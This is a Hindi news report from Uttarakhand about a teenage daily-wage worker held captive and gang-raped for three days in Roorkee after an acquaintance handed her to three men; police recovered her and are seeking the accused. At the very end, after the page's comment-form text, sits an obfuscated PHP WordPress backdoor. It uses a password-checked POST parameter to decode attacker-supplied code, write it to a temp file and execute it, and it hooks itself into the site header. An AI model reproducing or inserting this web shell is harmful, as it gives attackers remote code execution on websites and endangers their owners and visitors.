Uttarakhand: तीन दिन तक किशोरी को बंधक बनाकर करते रहे सामूहिक दुष्कर्म, परिचित ने ही किया था दरिंदों के हवाले

Uttarakhand Press 31 July 2023: श्यामपुर क्षेत्र के एक गांव निवासी किशोरी दो महीने से दिहाड़ी मजदूरी करने के लिए आ रही थी। दिहाड़ी पर आने के बाद चार दिन पहले उसका नंबर बंद हो गया। संपर्क न होने पर परिजन बहाराबाद पहुंचे तो किशोरी उन्हें नहीं मिली। बाद में किशोरी के साथ हुई घटना की बात सामने आई।

श्यामपुर थाना क्षेत्र निवासी एक किशोरी को रुड़की में तीन दिन तक बंधक बनाकर सामूहिक दुष्कर्म का मामला सामने आया है। पुलिस ने शिकायत मिलने के बाद किशोरी को रुड़की से बरामद कर लिया है। दिहाड़ी मजदूरी करने वाली किशोरी को उसकी परिचित युवती ने तीन युवकों के हवाले किया था। जबकि आरोपी युवक और युवती की तलाश शुरू कर दी है।

बहादराबाद क्षेत्र में एक ठेकेदार के पास श्यामपुर क्षेत्र के एक गांव निवासी किशोरी दो महीने से दिहाड़ी मजदूरी करने के लिए आ रही थी। दिहाड़ी पर आने के बाद चार दिन पहले उसका नंबर बंद हो गया। संपर्क न होने पर परिजन बहाराबाद पहुंचे तो किशोरी उन्हें नहीं मिली।

परिजनों ने पुलिस को शिकायत दी। श्यामपुर पुलिस ने गुमशुदगी दर्ज कर तलाश शुरू की। चंडीघाट चौकी प्रभारी अंशुल अग्रवाल ने टीम के साथ तलाश करते हुए कुछ घंटों के अंदर ही उसे रुड़की क्षेत्र से बरामद कर लिया और परिजनों के सुपुर्द कर दिया।

परिजनों के सामने बताया पीड़िता ने दर्द:
परिजनों को किशोरी ने जानकारी दी कि उसकी परिचित युवती ने उसे रुड़की ले जाकर तीन युवकों के हवाले कर दिया। जिन्होंने कई दिन तक उसे बंधक बनाकर दुष्कर्म किया है। ये पता चलते ही परिजनों के होश उड़ गए। वह देवभूमि भैरव सेना संगठन के अध्यक्ष चरणजीत सिंह पाहवा के पास किशोरी को लेकर गए।

आरोपियों की तलाश जारी:
पाहवा ने पूरे मामले को सुनने के बाद उसके परिवार के साथ चंडीघाट चौकी पहुंचकर पुलिस को पूरी कहानी बताई। मामले की जांच नगर कोतवाली में तैनात महिला उप निरीक्षक प्रिंयका भारद्वाज को दी गई। एसओ श्यामपुर विनोद थपलियाल ने बताया कि आरोपियों की तलाश की जा रही है। जल्द ही उन्हें गिरफ्तार कर लिया जाएगा।

Read Previous

हल्द्वानी: नौकरानी पर था शक तो घर में लगा दिया हिडन कैमरा, नौकरानी ने डॉक्टर दंपति के घर से चुराए 11 लाख रुपये

Read Next

Threads पर जल्द पेश होने जा रहा है DM वाला फीचर, Adam Mosseri ने लगाई मुहर

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}